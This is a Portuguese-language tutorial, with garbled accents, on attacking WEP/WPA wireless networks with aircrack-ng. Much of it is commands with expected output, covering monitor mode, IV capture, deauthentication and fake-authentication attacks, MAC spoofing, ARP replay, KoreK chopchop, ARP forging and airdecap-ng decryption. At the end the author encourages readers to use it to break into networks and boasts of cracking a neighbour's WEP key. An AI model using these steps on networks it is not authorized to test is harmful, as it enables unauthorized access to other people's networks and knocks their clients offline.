Você está na página 1de 5

Para quem nunca viu ou tem curiosidade de aprender um pouco mais sobre rede wire less, sugiro que

busca mais informaes no link abaixo: http://www.warchalking.com.br Pois nele h uma bom caminho para aprender sobre rede wireless, defesa e ataque e bastante interessante! Bom, vamos comear nosso artigo: Primeiro: Todos os arquivos de captura de pacotes devem ter a seguinte extenso: * .cap, *.ivs. Segundo: Vamos instalar o aircrack-ng: uso Debian e creio que nas outras distro devem vir com o pacote por padro no gerenciador de arquivos da distro (no caso do debians-like, aptitude ou apt-get, no Gentoo emerge e no Red-Had-like yum, e as sim vai... basta voc pesquisar no Google). Caso voc no ache em seu gerenciador de p acotes, pode baixar da net e instalar manualmente, segue o site do aircrack-ng: http://www.aircrack-ng.org AIRMON-NG (vem instalado com o aircrack-ng): Esta a ferramenta para colocarmos nossa placa de rede wireless no estado monitor ! Devemos fazer isso antes de comear a capturar pacotes da rede wireless. Faamos o seguinte comando como root ou administrador: airmon-ng <start stop> <interface> [channel] Onde: <start stop> inicia ou para de monitorar; <interface> sua interface de rede ex.: ethX, rawX, athX, etc; [channel] o canal que sua placa de rede wireless ir trabalhar Beleza, feito isso vamos para o segundo tpico! Captura de pacotes Pronto, agora com sua placa de rede monitorando a rede wireless presente por per to, vamos para uma parte importante de quebra de rede wireless... a captura dos pacotes transmitidos pelo protocolo 802.11! Usaremos a seguinte ferramenta que t ambm vem com aircrack-ng, que se chama: AIRODUMP-NG Sua principal finalidade capturar e coletar ivs (Initialization Vectors) dos pac otes WEP, para que aps coletados usaremos a ferramenta chamada aircrack-ng para s abermos qual chave esse pacote WEP que capturamos est usando. OBS: Caso no seu computador aja algum receptor GPS, o airodump-ng ir mostrar o po sicionamento em coordenadas, que se encontra o Access Point que voc est coletando pacotes... legal no?! Usando o airodump-ng como root: airodump-ng <options> <interfaces> <interfaces> - interfaces da sua placa de rede (ethX, athX, rawX, wifiX, etc) Suas <options> so: -ivs: Somente capturar ivs; --gpsd: Usar um dispositivo GPS, caso tenha; --write: Cria um arquivo com o nome escolhido e com a extenso (*.cap ou *.ivs) e

comea a capturar; -w: o mesmo que --write; --beacons: Guarda os beacons (no guardado por padro); --channel ou -c: Especifica um canal para a captura; -a: Captura na frequncia de 5Ghz especfica da banda A; --abg: Captura tanto em frequncias de 2,4Ghz como em 5 Ghz. Bom, por padro o airodump-ng captura pacotes dentro dos canais que se encontram n a frequncia de 2.4GHz. Capturando e escrevendo no arquivo teste.ivs, no canal 11, nas frequncias entre 2 .4 5 GHz e com a interface da placa de rede wireless: # airodump-ng --ivs -w teste.ivs -c 11 -abg ath0 Captura de pacotes com arquivo teste.cap, no canal 11, nas frequncias entre 2.4 5 GHz e com a interface da placa de rede wireless: # airodump-ng -w teste.cap -c 11 -abg ath0 O programa airodump-ng oscila entre WEP e WAP, quando o sua placa no rejeita paco tes corrompidos. O airodump-ng ir mostra isso no terminal: Depois de capturados o pacotes da rede, vamos ver agora como atacar a rede wirel ess com a seguinte ferramenta, que tambm vem com o aircrack-ng. AIREPLAY-NG: H cinco maneiras diferentes de atacar com o aireplay-ng, o programa aireplay-ng c lassifica da seguinte maneira: 0: Desautenticao; 1: Autentificao falsa; 2: Seleo interativa do pacote a enviar; 3: Reinjeo de requisio ARP; 4: O chamado "chopchop" de KoreK (predico de CRC), pois ele utiliza essa classific ao como referncia para o ataque! Ataque zero Faz com que o usurio conectado ao AP (Access Point) desautentique e volte a conec tar, fazendo assim que ele faa uma nova requisio ARP e enviar um novo handshake. Ne ste ataque podemos utilizar vrias maneiras: Capturar Handshake WPA: # aireplay-ng -0 5 -a MACdoAP -c MAC do Client <interface> Reinjeo ARP (ataque 3): # aireplay-ng -0 10 -a MACdoAP <interface> (faz todos os usurios conectados ao AP carem para nova requisio ARP) # aireplay-ng -3 -b MACdoAP -h MAC do Client <interface> (reinjeo dos pacotes obtidos) Rejeitar que o cliente se conecte: # aireplay-ng -0 0 -a MACdoAP <interface> (todos os clientes conectados ao AP)

# aireplay-ng -0 0 -a MACdoAP -c MACdoCliente <interface> (somente um cliente) Ataque um Este ataque funciona com xito quando temos um cliente conectado ao AP, caso no ten ha, faremos uma cliente para conectar a esse AP. Mas lembre-se, melhor quando te mos uma cliente conectado ao AP, pois assim geraremos trfego ARP. Vamos mudar o nosso MAC: # ifconfig <interface> down # ifconfig <interface> hw ether 00:11:22:33:44:55 # ifconfig <interface> up Agora vamos atacar: # aireplay-ng -1 0 -e SeuESSID -a MACdoAP -h 00:11:22:33:44:55 <interface> Se der certo aparecer algo assim: 12:14:06 12:14:06 12:14:06 12:14:07 Sending Authentication Request Authentication successful Sending Association Request Association successful :-)

Como alguns APs podem requerer autenticao de tantos em tantos segundos, o aireplay -ng consegue fazer isso da seguinte maneira: # aireplay-ng -1 <QntdeSegundos> -e SeuESSIDFalso -a MACdoAP -h 00:11:22:33:44:5 5 <interface> Caso este ataque no seja bem sucedido (aireplay continua enviando pacotes de pedi do de autenticao), pode ser que esteja usando filtro de MAC Address. Verifique o s eguinte tambm: Est com o controlador corretamente instalado e com os patches devidamente aplicad os. A placa wireless est configurada no mesmo canal que o Access Point. O BSSID e o ESSID (opes -a / -e) so as corretas. Se for Prism2, verifique se o firm ware est atualizado. Algumas placas de rede s suportam associar e injetar/monitorar atravs da interface <interface>Xraw, por isso talvez voc precise fazer: # ifconfig <interface> down hw ether 00:11:22:33:44:55 # iwconfig <interface> mode Managed essid 'the ssid' key AAAAAAAAAA # ifconfig <interface> up # sysctl -w dev.<interface>.rawdev=1 (Cria o <interface>Xraw) # ifconfig <interface>raw up # airodump-ng <interface>raw out 6 Ento voc poder usar os ATAQUES 3 e 4 (o aireplay-ng substitui o <interface> pela <i nterface>raw que criamos caso sua placa precise).

# aireplay-ng -3 -h 00:11:22:33:44:55 -b MACdoAP <interface> (ATAQUE 3) # aireplay-ng -4 -h 00:10:20:30:40:50 -f 1 <interface> (ATAQUE 4) Ataque dois Peo desculpas, mas este ataque dois eu no entendi muito bem... vou tentar falar ma is o menos o que eu capturei... caso algum saiba, favor postar um comentrio para m e ajudar a entender e aos outros!!! VLWWWWW. Ele pode selecionar um pacote qualquer e envi-lo... # aireplay-ng -2 -b MACdoAP -n 100 -p 0841 -h MACdoClient -c MACdoAP <interface> hehehehe =D Ataque trs O famoso ataque de reinjeo de de requisio ARP o mais efetivo para gerar IVs, e funci ona muito bem!!! =) Este ataque requer um MAC de um cliente associado ou um MAC falso como montamos no ATAQUE 1! Este ataque pode demorar bastanteee... at que ap area a requisio ARP, ele falhar rapidamente se no houver trfego. Como usamos no ATAQUE 1: # aireplay-ng -3 -h 00:11:22:33:44:55 -b MACdoAP <interface> Aparecer o seguinte: Saving ARP requests in replay_arp-0627-121526.cap You must also start airodump to capture replies. Read 2493 packets (got 1 ARP requests), sent 1305 packets... Ataque quatro Ataque nomeado de "chopchop" de KoreK, este ataque timo quando bem sucedido, pois ele desencripta um pacote WEP sem conhecer a sua chave e tambm pode usar uma WEP dinmica.

Pelo o que eu li esse ataque no recupera a chave WEP, ele s revela em texto plano. Alguns APs no so to vulnerveis assim. Outros parecem at demais (vulnerveis) pelo fat fato de jogarem os pacotes menores que 60 bytes. O aireplay-ng consegue adivinhar o resto pacotes, que so menores que 42 bytes, qu e so jogados pelos APs, assim que o header tornar-se predictvel. Primeiro, decriptamos um pacote: # aireplay-ng -4 <interface> Se no funcionar porque o AP precisa de um MAC especfico filtrado neste AP. Assim, termos que usar um MAC de um cliente est conectado no AP: # aireplay-ng -4 -h MACdoCLiente <interface> Segundo olharemos o IP: # tcpdump -s 0 -n -e -r replay_dec-0627-022301.cap Aparecer algo assim:

reading from file replay_dec-0627-022301.cap, link-type [...] IP 192.168.1.2 > 192.168.1.255: icmp 64: echo request seq 1 Agora, forjamos uma requisio ARP: # arpforge-ng replay_dec-0627-022301.xor 1 MACdoCliente MACdoAP 192.168.1.100 19 2.168.1.2 arp.cap A faixa de IP inicial (192.168.1.100) no importa, mas sim a de destino (192.168.1 .2). Reenviando o ARP forjado: # aireplay-ng -2 -r arp.cap ath0 Uhullll loco neh!!?!?! Vamos para o final, que fala sobre como decriptar a chave capturada. Vamos utilizar a ferramenta: AIRDECAP-NG Serve para decriptar a chave WEP/WPA1 que foi capturada no arquivo.cap. airdecap-ng [opes] As opes:

PS: Tambm no esto traduzidas... mas d para entender hehehehe!!! =DDDD Segue o exemplo: # airdecap-ng -b 00:09:5B:10:BC:5A open-network.cap # airdecap-ng -w 11A3E229084349BC25D97E2939 wep.cap # airdecap-ng -e 'the ssid' -p passphrase tkip.cap Bom isso pessoall, seguem uns links de sites muitos bons... http://hwagm.elhacker.net http://www.warchalking.com.br http://www.mundowifi.com.br http://www.aircrack-ng.org Fal galera... espero que tenham gostado do tutoriall... no ficou uns dos melhores explicados, mas foi mais ou menos assim que aprendi e gostaria de compartilhar c om vocs essa ferramenta. Ah, e pode usar este tuto para invadir tambm que funciona, eu quebrei a senha wep do meu vizinho... se quiserem aprender mais leiam, h muita coisa na net em ingls e espanhol. Divirtam-se e abrao a todossss hehehe =) E se tiverem mais informaes, favor no deixem de postar aqui ou em outro artigo!!! F uiiiiiiii. Meu email est atualizado agora.

Você também pode gostar